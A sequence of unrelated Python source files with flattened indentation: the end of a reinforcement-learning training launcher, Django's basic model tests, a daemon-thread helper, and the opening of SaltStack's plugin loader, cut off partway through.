normalize_advantages=not(args.dont_normalize_advantages),
seed=seed,
n_layers=args.n_layers,
size=args.size
)
# # Awkward hacky process runs, because Tensorflow does not like
# # repeatedly calling train_AC in the same thread.
p = Process(target=train_func, args=tuple())
p.start()
processes.append(p)
# if you comment in the line below, then the loop will block
# until this process finishes
# p.join()
for p in processes:
p.join()
if __name__ == "__main__":
main()
|
tests.py
|
from __future__ import unicode_literals
import threading
import warnings
from datetime import datetime, timedelta
from django.core.exceptions import MultipleObjectsReturned, ObjectDoesNotExist
from django.db import DEFAULT_DB_ALIAS, DatabaseError, connections
from django.db.models.fields import Field
from django.db.models.fields.related import ForeignObjectRel
from django.db.models.manager import BaseManager
from django.db.models.query import EmptyQuerySet, QuerySet
from django.test import (
SimpleTestCase, TestCase, TransactionTestCase, skipIfDBFeature,
skipUnlessDBFeature,
)
from django.utils import six
from django.utils.translation import ugettext_lazy
from .models import Article, ArticleSelectOnSave, SelfRef
class ModelInstanceCreationTests(TestCase):
def test_object_is_not_written_to_database_until_save_was_called(self):
a = Article(
id=None,
headline='Parrot programs in Python',
pub_date=datetime(2005, 7, 28),
)
self.assertIsNone(a.id)
self.assertEqual(Article.objects.all().count(), 0)
# Save it into the database. You have to call save() explicitly.
a.save()
self.assertIsNotNone(a.id)
self.assertEqual(Article.objects.all().count(), 1)
def test_can_initialize_model_instance_using_positional_arguments(self):
"""
You can initialize a model instance using positional arguments,
which should match the field order as defined in the model.
"""
a = Article(None, 'Second article', datetime(2005, 7, 29))
a.save()
self.assertEqual(a.headline, 'Second article')
self.assertEqual(a.pub_date, datetime(2005, 7, 29, 0, 0))
def test_can_create_instance_using_kwargs(self):
a = Article(
id=None,
headline='Third article',
pub_date=datetime(2005, 7, 30),
)
a.save()
self.assertEqual(a.headline, 'Third article')
self.assertEqual(a.pub_date, datetime(2005, 7, 30, 0, 0))
def test_autofields_generate_different_values_for_each_instance(self):
a1 = Article.objects.create(headline='First', pub_date=datetime(2005, 7, 30, 0, 0))
a2 = Article.objects.create(headline='First', pub_date=datetime(2005, 7, 30, 0, 0))
a3 = Article.objects.create(headline='First', pub_date=datetime(2005, 7, 30, 0, 0))
self.assertNotEqual(a3.id, a1.id)
self.assertNotEqual(a3.id, a2.id)
def test_can_mix_and_match_position_and_kwargs(self):
# You can also mix and match position and keyword arguments, but
# be sure not to duplicate field information.
a = Article(None, 'Fourth article', pub_date=datetime(2005, 7, 31))
a.save()
self.assertEqual(a.headline, 'Fourth article')
def test_cannot_create_instance_with_invalid_kwargs(self):
six.assertRaisesRegex(
self,
TypeError,
"'foo' is an invalid keyword argument for this function",
Article,
id=None,
headline='Some headline',
pub_date=datetime(2005, 7, 31),
foo='bar',
)
def test_can_leave_off_value_for_autofield_and_it_gets_value_on_save(self):
"""
You can leave off the value for an AutoField when creating an
object, because it'll get filled in automatically when you save().
"""
a = Article(headline='Article 5', pub_date=datetime(2005, 7, 31))
a.save()
self.assertEqual(a.headline, 'Article 5')
self.assertNotEqual(a.id, None)
def test_leaving_off_a_field_with_default_set_the_default_will_be_saved(self):
a = Article(pub_date=datetime(2005, 7, 31))
a.save()
self.assertEqual(a.headline, 'Default headline')
def test_for_datetimefields_saves_as_much_precision_as_was_given(self):
"""as much precision in *seconds*"""
a1 = Article(
headline='Article 7',
pub_date=datetime(2005, 7, 31, 12, 30),
)
a1.save()
self.assertEqual(Article.objects.get(id__exact=a1.id).pub_date,
datetime(2005, 7, 31, 12, 30))
a2 = Article(
headline='Article 8',
pub_date=datetime(2005, 7, 31, 12, 30, 45),
)
a2.save()
self.assertEqual(Article.objects.get(id__exact=a2.id).pub_date,
datetime(2005, 7, 31, 12, 30, 45))
def test_saving_an_object_again_does_not_create_a_new_object(self):
a = Article(headline='original', pub_date=datetime(2014, 5, 16))
a.save()
current_id = a.id
a.save()
self.assertEqual(a.id, current_id)
a.headline = 'Updated headline'
a.save()
self.assertEqual(a.id, current_id)
def test_querysets_checking_for_membership(self):
headlines = [
'Parrot programs in Python', 'Second article', 'Third article']
some_pub_date = datetime(2014, 5, 16, 12, 1)
for headline in headlines:
Article(headline=headline, pub_date=some_pub_date).save()
a = Article(headline='Some headline', pub_date=some_pub_date)
a.save()
# You can use 'in' to test for membership...
self.assertIn(a, Article.objects.all())
# ... but there will often be more efficient ways if that is all you need:
self.assertTrue(Article.objects.filter(id=a.id).exists())
class ModelTest(TestCase):
def test_objects_attribute_is_only_available_on_the_class_itself(self):
six.assertRaisesRegex(
self,
AttributeError,
"Manager isn't accessible via Article instances",
getattr,
Article(),
"objects",
)
self.assertFalse(hasattr(Article(), 'objects'))
self.assertTrue(hasattr(Article, 'objects'))
def test_queryset_delete_removes_all_items_in_that_queryset(self):
headlines = [
'An article', 'Article One', 'Amazing article', 'Boring article']
some_pub_date = datetime(2014, 5, 16, 12, 1)
for headline in headlines:
Article(headline=headline, pub_date=some_pub_date).save()
self.assertQuerysetEqual(Article.objects.all().order_by('headline'),
["<Article: Amazing article>",
"<Article: An article>",
"<Article: Article One>",
"<Article: Boring article>"])
Article.objects.filter(headline__startswith='A').delete()
self.assertQuerysetEqual(Article.objects.all().order_by('headline'),
["<Article: Boring article>"])
def test_not_equal_and_equal_operators_behave_as_expected_on_instances(self):
some_pub_date = datetime(2014, 5, 16, 12, 1)
a1 = Article.objects.create(headline='First', pub_date=some_pub_date)
a2 = Article.objects.create(headline='Second', pub_date=some_pub_date)
self.assertNotEqual(a1, a2)
self.assertEqual(a1, Article.objects.get(id__exact=a1.id))
self.assertNotEqual(Article.objects.get(id__exact=a1.id), Article.objects.get(id__exact=a2.id))
@skipUnlessDBFeature('supports_microsecond_precision')
def test_microsecond_precision(self):
# In PostgreSQL, microsecond-level precision is available.
a9 = Article(
headline='Article 9',
pub_date=datetime(2005, 7, 31, 12, 30, 45, 180),
)
a9.save()
self.assertEqual(Article.objects.get(pk=a9.pk).pub_date,
datetime(2005, 7, 31, 12, 30, 45, 180))
@skipIfDBFeature('supports_microsecond_precision')
def test_microsecond_precision_not_supported(self):
# In MySQL, microsecond-level precision isn't always available. You'll
# lose microsecond-level precision once the data is saved.
a9 = Article(
headline='Article 9',
pub_date=datetime(2005, 7, 31, 12, 30, 45, 180),
)
a9.save()
self.assertEqual(
Article.objects.get(id__exact=a9.id).pub_date,
datetime(2005, 7, 31, 12, 30, 45),
)
@skipIfDBFeature('supports_microsecond_precision')
def test_microsecond_precision_not_supported_edge_case(self):
# In MySQL, microsecond-level precision isn't always available. You'll
# lose microsecond-level precision once the data is saved.
a = Article.objects.create(
headline='Article',
pub_date=datetime(2008, 12, 31, 23, 59, 59, 999999),
)
self.assertEqual(
Article.objects.get(pk=a.pk).pub_date,
datetime(2008, 12, 31, 23, 59, 59),
)
def test_manually_specify_primary_key(self):
# You can manually specify the primary key when creating a new object.
a101 = Article(
id=101,
headline='Article 101',
pub_date=datetime(2005, 7, 31, 12, 30, 45),
)
a101.save()
a101 = Article.objects.get(pk=101)
self.assertEqual(a101.headline, 'Article 101')
def test_create_method(self):
# You can create saved objects in a single step
a10 = Article.objects.create(
headline="Article 10",
pub_date=datetime(2005, 7, 31, 12, 30, 45),
)
self.assertEqual(Article.objects.get(headline="Article 10"), a10)
def test_year_lookup_edge_case(self):
# Edge-case test: A year lookup should retrieve all objects in
# the given year, including Jan. 1 and Dec. 31.
Article.objects.create(
headline='Article 11',
pub_date=datetime(2008, 1, 1),
)
Article.objects.create(
headline='Article 12',
pub_date=datetime(2008, 12, 31, 23, 59, 59, 999999),
)
self.assertQuerysetEqual(Article.objects.filter(pub_date__year=2008),
["<Article: Article 11>", "<Article: Article 12>"])
def test_unicode_data(self):
# Unicode data works, too.
a = Article(
headline='\u6797\u539f \u3081\u3050\u307f',
pub_date=datetime(2005, 7, 28),
)
a.save()
self.assertEqual(Article.objects.get(pk=a.id).headline,
'\u6797\u539f \u3081\u3050\u307f')
def test_hash_function(self):
# Model instances have a hash function, so they can be used in sets
# or as dictionary keys. Two models compare as equal if their primary
# keys are equal.
a10 = Article.objects.create(
headline="Article 10",
pub_date=datetime(2005, 7, 31, 12, 30, 45),
)
a11 = Article.objects.create(
headline='Article 11',
pub_date=datetime(2008, 1, 1),
)
a12 = Article.objects.create(
headline='Article 12',
pub_date=datetime(2008, 12, 31, 23, 59, 59, 999999),
)
s = {a10, a11, a12}
self.assertIn(Article.objects.get(headline='Article 11'), s)
def test_field_ordering(self):
"""
Field instances have a `__lt__` comparison function to define an
ordering based on their creation. Prior to #17851 this ordering
comparison relied on the now unsupported `__cmp__` and assumed that the
compared objects were both Field instances, raising `AttributeError`
when it should have returned `NotImplemented`.
"""
f1 = Field()
f2 = Field(auto_created=True)
f3 = Field()
self.assertLess(f2, f1)
self.assertGreater(f3, f1)
self.assertIsNotNone(f1)
self.assertNotIn(f2, (None, 1, ''))
def test_extra_method_select_argument_with_dashes_and_values(self):
# The 'select' argument to extra() supports names with dashes in
# them, as long as you use values().
Article.objects.create(
headline="Article 10",
pub_date=datetime(2005, 7, 31, 12, 30, 45),
)
Article.objects.create(
headline='Article 11',
pub_date=datetime(2008, 1, 1),
)
Article.objects.create(
headline='Article 12',
pub_date=datetime(2008, 12, 31, 23, 59, 59, 999999),
)
dicts = Article.objects.filter(
pub_date__year=2008).extra(
select={'dashed-value': '1'}).values('headline', 'dashed-value')
self.assertEqual([sorted(d.items()) for d in dicts],
[[('dashed-value', 1), ('headline', 'Article 11')], [('dashed-value', 1), ('headline', 'Article 12')]])
def test_extra_method_select_argument_with_dashes(self):
# If you use 'select' with extra() and names containing dashes on a
# query that's *not* a values() query, those extra 'select' values
# will silently be ignored.
Article.objects.create(
headline="Article 10",
pub_date=datetime(2005, 7, 31, 12, 30, 45),
)
Article.objects.create(
headline='Article 11',
pub_date=datetime(2008, 1, 1),
)
Article.objects.create(
headline='Article 12',
pub_date=datetime(2008, 12, 31, 23, 59, 59, 999999),
)
articles = Article.objects.filter(
pub_date__year=2008).extra(select={'dashed-value': '1', 'undashedvalue': '2'})
self.assertEqual(articles[0].undashedvalue, 2)
def test_create_relation_with_ugettext_lazy(self):
"""
Test that ugettext_lazy objects work when saving model instances
through various methods. Refs #10498.
"""
notlazy = 'test'
lazy = ugettext_lazy(notlazy)
Article.objects.create(headline=lazy, pub_date=datetime.now())
article = Article.objects.get()
self.assertEqual(article.headline, notlazy)
# test that assign + save works with Promise objects
article.headline = lazy
article.save()
self.assertEqual(article.headline, notlazy)
# test .update()
Article.objects.update(headline=lazy)
article = Article.objects.get()
self.assertEqual(article.headline, notlazy)
# still test bulk_create()
Article.objects.all().delete()
Article.objects.bulk_create([Article(headline=lazy, pub_date=datetime.now())])
article = Article.objects.get()
self.assertEqual(article.headline, notlazy)
def test_emptyqs(self):
# Can't be instantiated
with self.assertRaises(TypeError):
EmptyQuerySet()
self.assertIsInstance(Article.objects.none(), EmptyQuerySet)
def test_emptyqs_values(self):
# test for #15959
Article.objects.create(headline='foo', pub_date=datetime.now())
with self.assertNumQueries(0):
qs = Article.objects.none().values_list('pk')
self.assertIsInstance(qs, EmptyQuerySet)
self.assertEqual(len(qs), 0)
def test_emptyqs_customqs(self):
# A hacky test for custom QuerySet subclass - refs #17271
Article.objects.create(headline='foo', pub_date=datetime.now())
class CustomQuerySet(QuerySet):
def do_something(self):
return 'did something'
qs = Article.objects.all()
qs.__class__ = CustomQuerySet
qs = qs.none()
with self.assertNumQueries(0):
self.assertEqual(len(qs), 0)
self.assertIsInstance(qs, EmptyQuerySet)
self.assertEqual(qs.do_something(), 'did something')
def test_emptyqs_values_order(self):
# Tests for ticket #17712
Article.objects.create(headline='foo', pub_date=datetime.now())
with self.assertNumQueries(0):
self.assertEqual(len(Article.objects.none().values_list('id').order_by('id')), 0)
with self.assertNumQueries(0):
self.assertEqual(len(Article.objects.none().filter(
id__in=Article.objects.values_list('id', flat=True))), 0)
@skipUnlessDBFeature('can_distinct_on_fields')
def test_emptyqs_distinct(self):
# Tests for #19426
Article.objects.create(headline='foo', pub_date=datetime.now())
with self.assertNumQueries(0):
self.assertEqual(len(Article.objects.none().distinct('headline', 'pub_date')), 0)
def test_ticket_20278(self):
sr = SelfRef.objects.create()
with self.assertRaises(ObjectDoesNotExist):
SelfRef.objects.get(selfref=sr)
def test_eq(self):
self.assertEqual(Article(id=1), Article(id=1))
self.assertNotEqual(Article(id=1), object())
self.assertNotEqual(object(), Article(id=1))
a = Article()
self.assertEqual(a, a)
self.assertNotEqual(Article(), a)
def test_hash(self):
# Value based on PK
self.assertEqual(hash(Article(id=1)), hash(1))
with self.assertRaises(TypeError):
# No PK value -> unhashable (because save() would then change
# hash)
hash(Article())
class ModelLookupTest(TestCase):
def setUp(self):
# Create an Article.
self.a = Article(
id=None,
headline='Swallow programs in Python',
pub_date=datetime(2005, 7, 28),
)
# Save it into the database. You have to call save() explicitly.
self.a.save()
def test_all_lookup(self):
# Change values by changing the attributes, then calling save().
self.a.headline = 'Parrot programs in Python'
self.a.save()
# Article.objects.all() returns all the articles in the database.
self.assertQuerysetEqual(Article.objects.all(),
['<Article: Parrot programs in Python>'])
def test_rich_lookup(self):
# Django provides a rich database lookup API.
self.assertEqual(Article.objects.get(id__exact=self.a.id), self.a)
self.assertEqual(Article.objects.get(headline__startswith='Swallow'), self.a)
self.assertEqual(Article.objects.get(pub_date__year=2005), self.a)
self.assertEqual(Article.objects.get(pub_date__year=2005, pub_date__month=7), self.a)
self.assertEqual(Article.objects.get(pub_date__year=2005, pub_date__month=7, pub_date__day=28), self.a)
self.assertEqual(Article.objects.get(pub_date__week_day=5), self.a)
def test_equal_lookup(self):
# The "__exact" lookup type can be omitted, as a shortcut.
self.assertEqual(Article.objects.get(id=self.a.id), self.a)
self.assertEqual(Article.objects.get(headline='Swallow programs in Python'), self.a)
self.assertQuerysetEqual(
Article.objects.filter(pub_date__year=2005),
['<Article: Swallow programs in Python>'],
)
self.assertQuerysetEqual(
Article.objects.filter(pub_date__year=2004),
[],
)
self.assertQuerysetEqual(
Article.objects.filter(pub_date__year=2005, pub_date__month=7),
['<Article: Swallow programs in Python>'],
)
self.assertQuerysetEqual(
Article.objects.filter(pub_date__week_day=5),
['<Article: Swallow programs in Python>'],
)
self.assertQuerysetEqual(
Article.objects.filter(pub_date__week_day=6),
[],
)
def test_does_not_exist(self):
# Django raises an Article.DoesNotExist exception for get() if the
# parameters don't match any object.
six.assertRaisesRegex(
self,
ObjectDoesNotExist,
"Article matching query does not exist.",
Article.objects.get,
id__exact=2000,
)
# To avoid dict-ordering related errors check only one lookup
# in single assert.
self.assertRaises(
ObjectDoesNotExist,
Article.objects.get,
pub_date__year=2005,
pub_date__month=8,
)
six.assertRaisesRegex(
self,
ObjectDoesNotExist,
"Article matching query does not exist.",
Article.objects.get,
pub_date__week_day=6,
)
def test_lookup_by_primary_key(self):
# Lookup by a primary key is the most common case, so Django
# provides a shortcut for primary-key exact lookups.
# The following is identical to articles.get(id=a.id).
self.assertEqual(Article.objects.get(pk=self.a.id), self.a)
# pk can be used as a shortcut for the primary key name in any query.
self.assertQuerysetEqual(Article.objects.filter(pk__in=[self.a.id]),
["<Article: Swallow programs in Python>"])
# Model instances of the same type and same ID are considered equal.
a = Article.objects.get(pk=self.a.id)
b = Article.objects.get(pk=self.a.id)
self.assertEqual(a, b)
def test_too_many(self):
# Create a very similar object
a = Article(
id=None,
headline='Swallow bites Python',
pub_date=datetime(2005, 7, 28),
)
a.save()
self.assertEqual(Article.objects.count(), 2)
# Django raises an Article.MultipleObjectsReturned exception if the
# lookup matches more than one object
six.assertRaisesRegex(
self,
MultipleObjectsReturned,
"get\(\) returned more than one Article -- it returned 2!",
Article.objects.get,
headline__startswith='Swallow',
)
six.assertRaisesRegex(
self,
MultipleObjectsReturned,
"get\(\) returned more than one Article -- it returned 2!",
Article.objects.get,
pub_date__year=2005,
)
six.assertRaisesRegex(
self,
MultipleObjectsReturned,
"get\(\) returned more than one Article -- it returned 2!",
Article.objects.get,
pub_date__year=2005,
pub_date__month=7,
)
class ConcurrentSaveTests(TransactionTestCase):
available_apps = ['basic']
@skipUnlessDBFeature('test_db_allows_multiple_connections')
def test_concurrent_delete_with_save(self):
"""
Test fetching, deleting and finally saving an object - we should get
an insert in this case.
"""
a = Article.objects.create(headline='foo', pub_date=datetime.now())
exceptions = []
def deleter():
try:
# Do not delete a directly - doing so alters its state.
Article.objects.filter(pk=a.pk).delete()
except Exception as e:
exceptions.append(e)
finally:
connections[DEFAULT_DB_ALIAS].close()
self.assertEqual(len(exceptions), 0)
t = threading.Thread(target=deleter)
t.start()
t.join()
a.save()
self.assertEqual(Article.objects.get(pk=a.pk).headline, 'foo')
class ManagerTest(SimpleTestCase):
QUERYSET_PROXY_METHODS = [
'none',
'count',
'dates',
'datetimes',
'distinct',
'extra',
'get',
'get_or_create',
'update_or_create',
'create',
'bulk_create',
'filter',
'aggregate',
'annotate',
'complex_filter',
'exclude',
'in_bulk',
'iterator',
'earliest',
'latest',
'first',
'last',
'order_by',
'select_for_update',
'select_related',
'prefetch_related',
'values',
'values_list',
'update',
'reverse',
'defer',
'only',
'using',
'exists',
'_insert',
'_update',
'raw',
]
def test_manager_methods(self):
"""
This test ensures that the correct set of methods from `QuerySet`
are copied onto `Manager`.
It's particularly useful to prevent accidentally leaking new methods
into `Manager`. New `QuerySet` methods that should also be copied onto
`Manager` will need to be added to `ManagerTest.QUERYSET_PROXY_METHODS`.
"""
self.assertEqual(
sorted(BaseManager._get_queryset_methods(QuerySet).keys()),
sorted(self.QUERYSET_PROXY_METHODS),
)
class SelectOnSaveTests(TestCase):
def test_select_on_save(self):
a1 = Article.objects.create(pub_date=datetime.now())
with self.assertNumQueries(1):
a1.save()
asos = ArticleSelectOnSave.objects.create(pub_date=datetime.now())
with self.assertNumQueries(2):
asos.save()
with self.assertNumQueries(1):
asos.save(force_update=True)
Article.objects.all().delete()
with self.assertRaises(DatabaseError):
with self.assertNumQueries(1):
asos.save(force_update=True)
def test_select_on_save_lying_update(self):
"""
Test that select_on_save works correctly if the database
doesn't return correct information about matched rows from
UPDATE.
"""
# Change the manager to not return "row matched" for update().
# We are going to change the Article's _base_manager class
# dynamically. This is a bit of a hack, but it seems hard to
# test this properly otherwise. We change Article's manager, because
# proxy models use their parent model's _base_manager.
orig_class = Article._base_manager.__class__
class FakeQuerySet(QuerySet):
# Make sure the _update method below is in fact called.
called = False
def _update(self, *args, **kwargs):
FakeQuerySet.called = True
super(FakeQuerySet, self)._update(*args, **kwargs)
return 0
class FakeManager(orig_class):
def get_queryset(self):
return FakeQuerySet(self.model)
try:
Article._base_manager.__class__ = FakeManager
asos = ArticleSelectOnSave.objects.create(pub_date=datetime.now())
with self.assertNumQueries(3):
asos.save()
self.assertTrue(FakeQuerySet.called)
# This is not wanted behavior, but this is how Django has always
# behaved for databases that do not return correct information
# about matched rows for UPDATE.
with self.assertRaises(DatabaseError):
asos.save(force_update=True)
with self.assertRaises(DatabaseError):
asos.save(update_fields=['pub_date'])
finally:
Article._base_manager.__class__ = orig_class
class ModelRefreshTests(TestCase):
def _truncate_ms(self, val):
# MySQL < 5.6.4 removes microseconds from the datetimes which can cause
# problems when comparing the original value to that loaded from DB
return val - timedelta(microseconds=val.microsecond)
def test_refresh(self):
a = Article.objects.create(pub_date=self._truncate_ms(datetime.now()))
Article.objects.create(pub_date=self._truncate_ms(datetime.now()))
Article.objects.filter(pk=a.pk).update(headline='new headline')
with self.assertNumQueries(1):
a.refresh_from_db()
self.assertEqual(a.headline, 'new headline')
orig_pub_date = a.pub_date
new_pub_date = a.pub_date + timedelta(10)
Article.objects.update(headline='new headline 2', pub_date=new_pub_date)
with self.assertNumQueries(1):
a.refresh_from_db(fields=['headline'])
self.assertEqual(a.headline, 'new headline 2')
self.assertEqual(a.pub_date, orig_pub_date)
with self.assertNumQueries(1):
a.refresh_from_db()
self.assertEqual(a.pub_date, new_pub_date)
def test_refresh_fk(self):
s1 = SelfRef.objects.create()
s2 = SelfRef.objects.create()
s3 = SelfRef.objects.create(selfref=s1)
s3_copy = SelfRef.objects.get(pk=s3.pk)
s3_copy.selfref.touched = True
s3.selfref = s2
s3.save()
with self.assertNumQueries(1):
s3_copy.refresh_from_db()
with self.assertNumQueries(1):
# The old related instance was thrown away (the selfref_id has
# changed). It needs to be reloaded on access, so one query
# executed.
self.assertFalse(hasattr(s3_copy.selfref, 'touched'))
self.assertEqual(s3_copy.selfref, s2)
def test_refresh_null_fk(self):
s1 = SelfRef.objects.create()
s2 = SelfRef.objects.create(selfref=s1)
s2.selfref = None
s2.refresh_from_db()
self.assertEqual(s2.selfref, s1)
def test_refresh_unsaved(self):
pub_date = self._truncate_ms(datetime.now())
a = Article.objects.create(pub_date=pub_date)
a2 = Article(id=a.pk)
with self.assertNumQueries(1):
a2.refresh_from_db()
self.assertEqual(a2.pub_date, pub_date)
self.assertEqual(a2._state.db, "default")
def test_refresh_no_fields(self):
a = Article.objects.create(pub_date=self._truncate_ms(datetime.now()))
with self.assertNumQueries(0):
a.refresh_from_db(fields=[])
class TestRelatedObjectDeprecation(SimpleTestCase):
def test_field_related_deprecation(self):
field = SelfRef._meta.get_field('selfref')
with warnings.catch_warnings(record=True) as warns:
warnings.simplefilter('always')
self.assertIsInstance(field.related, ForeignObjectRel)
self.assertEqual(len(warns), 1)
self.assertEqual(
str(warns.pop().message),
'Usage of field.related has been deprecated. Use field.remote_field instead.'
)
|
thread.py
|
from __future__ import annotations
import traceback
from threading import Thread
from time import sleep
from typing import Callable
from tealprint import TealPrint
def start_thread(function: Callable, seconds_between_calls: float = 1, delay: float = 0) -> None:
"""Start a function in another thread as a daemon"""
    thread = Thread(target=_run_forever, args=(function, seconds_between_calls, delay), daemon=True)
thread.start()
def _run_forever(function: Callable, seconds_between_calls: float, delay: float) -> None:
if delay > 0:
sleep(delay)
TealPrint.info(f"🧵 Started thread {function.__qualname__}")
while True:
try:
function()
except Exception:
trace = traceback.format_exc()
TealPrint.warning(f"⚠🧵 Error in thread {function.__qualname__}:\n{trace}")
if seconds_between_calls > 0:
sleep(seconds_between_calls)
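# Usage sketch (an illustrative addition, not part of the original module;
# `heartbeat` is a hypothetical callable used only for demonstration):
if __name__ == "__main__":
    def heartbeat() -> None:
        TealPrint.info("heartbeat")

    # Run `heartbeat` every 5 seconds in a background thread, starting after a 1 second delay.
    start_thread(heartbeat, seconds_between_calls=5, delay=1)
    # Keep the main thread alive briefly so the background thread gets a chance to run.
    sleep(12)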
|
loader.py
|
"""
The Salt loader is the core to Salt's plugin system, the loader scans
directories for python loadable code and organizes the code into the
plugin interfaces used by Salt.
"""
import contextvars
import copy
import functools
import importlib.machinery # pylint: disable=no-name-in-module,import-error
import importlib.util # pylint: disable=no-name-in-module,import-error
import inspect
import logging
import os
import re
import sys
import tempfile
import threading
import time
import traceback
import types
from collections.abc import MutableMapping
from zipimport import zipimporter
import salt.config
import salt.defaults.events
import salt.defaults.exitcodes
import salt.loader_context
import salt.syspaths
import salt.utils.args
import salt.utils.context
import salt.utils.data
import salt.utils.dictupdate
import salt.utils.event
import salt.utils.files
import salt.utils.lazy
import salt.utils.odict
import salt.utils.platform
import salt.utils.stringutils
import salt.utils.versions
from salt.exceptions import LoaderError
from salt.ext import six
from salt.ext.six.moves import reload_module
from salt.template import check_render_pipe_str
from salt.utils.decorators import Depends
try:
import pkg_resources
HAS_PKG_RESOURCES = True
except ImportError:
HAS_PKG_RESOURCES = False
log = logging.getLogger(__name__)
SALT_BASE_PATH = os.path.abspath(salt.syspaths.INSTALL_DIR)
LOADED_BASE_NAME = "salt.loaded"
# pylint: disable=no-member
MODULE_KIND_SOURCE = 1
MODULE_KIND_COMPILED = 2
MODULE_KIND_EXTENSION = 3
MODULE_KIND_PKG_DIRECTORY = 5
SUFFIXES = []
for suffix in importlib.machinery.EXTENSION_SUFFIXES:
SUFFIXES.append((suffix, "rb", MODULE_KIND_EXTENSION))
for suffix in importlib.machinery.SOURCE_SUFFIXES:
SUFFIXES.append((suffix, "rb", MODULE_KIND_SOURCE))
for suffix in importlib.machinery.BYTECODE_SUFFIXES:
SUFFIXES.append((suffix, "rb", MODULE_KIND_COMPILED))
MODULE_KIND_MAP = {
MODULE_KIND_SOURCE: importlib.machinery.SourceFileLoader,
MODULE_KIND_COMPILED: importlib.machinery.SourcelessFileLoader,
MODULE_KIND_EXTENSION: importlib.machinery.ExtensionFileLoader,
}
# pylint: enable=no-member
PY3_PRE_EXT = re.compile(r"\.cpython-{}{}(\.opt-[1-9])?".format(*sys.version_info[:2]))
# Because the cloud drivers do `from salt.cloud.libcloudfuncs import *`, which
# simplifies code readability, some unsupported functions end up in the
# driver's module scope.
# We list the unsupported functions here; they will be removed from the loaded
# module.
# TODO: remove the need for this cross-module code. Maybe use NotImplemented
LIBCLOUD_FUNCS_NOT_SUPPORTED = (
"parallels.avail_sizes",
"parallels.avail_locations",
"proxmox.avail_sizes",
)
# Will be set to pyximport module at runtime if cython is enabled in config.
pyximport = None
def static_loader(
opts,
ext_type,
tag,
pack=None,
int_type=None,
ext_dirs=True,
ext_type_dirs=None,
base_path=None,
filter_name=None,
):
funcs = LazyLoader(
_module_dirs(
opts, ext_type, tag, int_type, ext_dirs, ext_type_dirs, base_path,
),
opts,
tag=tag,
pack=pack,
)
ret = {}
funcs._load_all()
if filter_name:
funcs = FilterDictWrapper(funcs, filter_name)
for key in funcs:
ret[key] = funcs[key]
return ret
def _format_entrypoint_target(ep):
"""
Makes a string describing the target of an EntryPoint object.
    Based strongly on EntryPoint.__str__().
"""
s = ep.module_name
if ep.attrs:
s += ":" + ".".join(ep.attrs)
return s
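# Illustration (hypothetical entry point): an EntryPoint parsed from
# "ext_dirs = my_pkg.loader:get_dirs" would be formatted as "my_pkg.loader:get_dirs".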
def _module_dirs(
opts,
ext_type,
tag=None,
int_type=None,
ext_dirs=True,
ext_type_dirs=None,
base_path=None,
):
if tag is None:
tag = ext_type
sys_types = os.path.join(base_path or SALT_BASE_PATH, int_type or ext_type)
ext_types = os.path.join(opts["extension_modules"], ext_type)
ext_type_types = []
if ext_dirs:
if ext_type_dirs is None:
ext_type_dirs = "{}_dirs".format(tag)
if ext_type_dirs in opts:
ext_type_types.extend(opts[ext_type_dirs])
if HAS_PKG_RESOURCES and ext_type_dirs:
for entry_point in pkg_resources.iter_entry_points(
"salt.loader", ext_type_dirs
):
try:
loaded_entry_point = entry_point.load()
for path in loaded_entry_point():
ext_type_types.append(path)
except Exception as exc: # pylint: disable=broad-except
log.error(
"Error getting module directories from %s: %s",
_format_entrypoint_target(entry_point),
exc,
)
log.debug(
"Full backtrace for module directories error", exc_info=True
)
cli_module_dirs = []
    # The dirs can be any module dir, or an in-tree _{ext_type} dir
for _dir in opts.get("module_dirs", []):
# Prepend to the list to match cli argument ordering
maybe_dir = os.path.join(_dir, ext_type)
if os.path.isdir(maybe_dir):
cli_module_dirs.insert(0, maybe_dir)
continue
maybe_dir = os.path.join(_dir, "_{}".format(ext_type))
if os.path.isdir(maybe_dir):
cli_module_dirs.insert(0, maybe_dir)
return cli_module_dirs + ext_type_types + [ext_types, sys_types]
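# Resulting search order (an illustrative summary of the return value above):
# CLI/"module_dirs" matches first, then any "{tag}_dirs"/entry-point paths,
# then the minion's extension_modules directory, then the shipped salt tree.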
def minion_mods(
opts,
context=None,
utils=None,
whitelist=None,
initial_load=False,
loaded_base_name=None,
notify=False,
static_modules=None,
proxy=None,
):
"""
Load execution modules
Returns a dictionary of execution modules appropriate for the current
system by evaluating the __virtual__() function in each module.
:param dict opts: The Salt options dictionary
:param dict context: A Salt context that should be made present inside
generated modules in __context__
:param dict utils: Utility functions which should be made available to
Salt modules in __utils__. See `utils_dirs` in
salt.config for additional information about
configuration.
:param list whitelist: A list of modules which should be whitelisted.
:param bool initial_load: Deprecated flag! Unused.
:param str loaded_base_name: A string marker for the loaded base name.
:param bool notify: Flag indicating that an event should be fired upon
completion of module loading.
.. code-block:: python
import salt.config
import salt.loader
__opts__ = salt.config.minion_config('/etc/salt/minion')
__grains__ = salt.loader.grains(__opts__)
__opts__['grains'] = __grains__
__utils__ = salt.loader.utils(__opts__)
__salt__ = salt.loader.minion_mods(__opts__, utils=__utils__)
__salt__['test.ping']()
"""
# TODO Publish documentation for module whitelisting
if not whitelist:
whitelist = opts.get("whitelist_modules", None)
ret = LazyLoader(
_module_dirs(opts, "modules", "module"),
opts,
tag="module",
pack={"__context__": context, "__utils__": utils, "__proxy__": proxy},
whitelist=whitelist,
loaded_base_name=loaded_base_name,
static_modules=static_modules,
extra_module_dirs=utils.module_dirs if utils else None,
pack_self="__salt__",
)
# Load any provider overrides from the configuration file providers option
# Note: Providers can be pkg, service, user or group - not to be confused
# with cloud providers.
providers = opts.get("providers", False)
if providers and isinstance(providers, dict):
for mod in providers:
            # sometimes the providers option is used for other configuration
            # rather than to diverge modules
try:
funcs = raw_mod(opts, providers[mod], ret)
except TypeError:
break
else:
if funcs:
for func in funcs:
f_key = "{}{}".format(mod, func[func.rindex(".") :])
ret[f_key] = funcs[func]
if notify:
with salt.utils.event.get_event("minion", opts=opts, listen=False) as evt:
evt.fire_event(
{"complete": True}, tag=salt.defaults.events.MINION_MOD_REFRESH_COMPLETE
)
return ret
def raw_mod(opts, name, functions, mod="modules"):
"""
Returns a single module loaded raw and bypassing the __virtual__ function
.. code-block:: python
import salt.config
import salt.loader
__opts__ = salt.config.minion_config('/etc/salt/minion')
testmod = salt.loader.raw_mod(__opts__, 'test', None)
testmod['test.ping']()
"""
loader = LazyLoader(
_module_dirs(opts, mod, "module"),
opts,
tag="rawmodule",
virtual_enable=False,
pack={"__salt__": functions},
)
# if we don't have the module, return an empty dict
if name not in loader.file_mapping:
return {}
loader._load_module(name) # load a single module (the one passed in)
